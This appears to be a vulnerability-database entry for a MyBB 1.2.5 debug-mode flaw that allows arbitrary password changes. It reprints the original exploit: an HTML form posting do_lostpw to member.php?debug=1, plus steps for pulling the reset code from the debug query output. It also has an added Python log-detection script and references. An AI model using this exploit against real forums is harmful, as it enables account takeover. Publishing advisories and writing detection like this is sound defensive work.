MyBB debug mode 'member.php' Permissions and Access Control Vulnerability

Vulnerability ID 1191030 Vulnerability type Unknown
Published 2007-04-11 Updated 2007-04-11
CVE ID CVE-2007-1964 CNNVD-ID CNNVD-200704-201
Affected platform N/A CVSS score 6.0
|Vulnerability Source
https://www.securityfocus.com/bid/86347
https://cxsecurity.com/issue/WLB-2007040051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-201
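|Vulnerability Details
When debug mode is available, member.php in MyBB (also known as MyBulletinBoard) has a permissions and access control vulnerability. A remote authenticated user can change the password of an arbitrary account by supplying the account's registered email address in a debug request for the do_lostpw action.
|Exploit (EXP)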
Hello,

Mybb Change Password Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]

If You Can Use the debug mode you will be able to change the password for any user by knowing the registered email address
Enter the email in the html code below after changing the website and mybb_dir to true variables then enter any user email address

Look at the query number 12 or search for awaitingactivation you will find like
INSERT INTO mybb123_awaitingactivation (uid, dateline, code, type) VALUES ('1', 'XXXX', 'ADbSXnoM', 'p')

--- >> ('1', 'XXXX', 'ADbSXnoM', 'p')
 1 is the userid , XXXX is the time , 
 'ADbSXnoM' is the change password verification code ,
 'p' is the type which is password change

<<<HTM EXPLOIT
<form action="http://website/mybb_dir/member.php?debug=1" method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td align="center">
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>
>>>

GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;

End of it :)
WwW.SoQoR.NeT
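
A detection sketch for the request pattern and debug-output leak described in the advisory above. This is an added example, not part of the original advisory or of MyBB's code; it assumes web server access logs in Combined Log Format, and the log lines, IP addresses and paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# The INSERT that the advisory says appears in the debug query list.
LEAK_RE = re.compile(r"INSERT\s+INTO\s+\w*awaitingactivation\b", re.IGNORECASE)

def is_debug_member_post(method, target):
    """POST to member.php with a debug parameter in the query string.
    The POST body (action=do_lostpw) is not in access logs, so the
    query-string flag is the signal available here."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if method != "POST" or not path.endswith("/member.php"):
        return False
    # parse_qs percent-decodes names, so %64ebug=1 is treated as debug=1.
    names = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    return "debug" in names

def find_suspect_requests(lines):
    """Return (ip, timestamp, target) for each matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_debug_member_post(m["method"], m["target"]):
            hits.append((m["ip"], m["ts"], m["target"]))
    return hits

def response_leaks_reset_query(body):
    """True if a response body exposes the awaitingactivation INSERT."""
    return bool(LEAK_RE.search(body))

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Apr/2007:10:00:01 +0000] "POST /forum/member.php?debug=1 HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.11 - - [11/Apr/2007:10:00:05 +0000] "POST /forum/member.php HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.7 - - [11/Apr/2007:10:01:00 +0000] "GET /forum/index.php?debug=1 HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.8 - - [11/Apr/2007:10:02:00 +0000] "POST /forum/Member.php?%64ebug=1 HTTP/1.0" 200 5000 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_suspect_requests(SAMPLE_LOG):
        print("suspect:", hit)
```

The response check is meant for an egress filter or a scan of cached pages: any page served to a non-administrator that contains this INSERT has exposed a password-change verification code.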
|Affected Products
MyBulletinBoard MyBulletinBoard 1.2.5
MyBB MyBB 1.2.5
|References

Source: BUGTRAQ
Name: 20070330 Mybb Change Password Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/464267/100/100/threaded
Source: SREASON
Name: 2544
Link: http://securityreason.com/securityalert/2544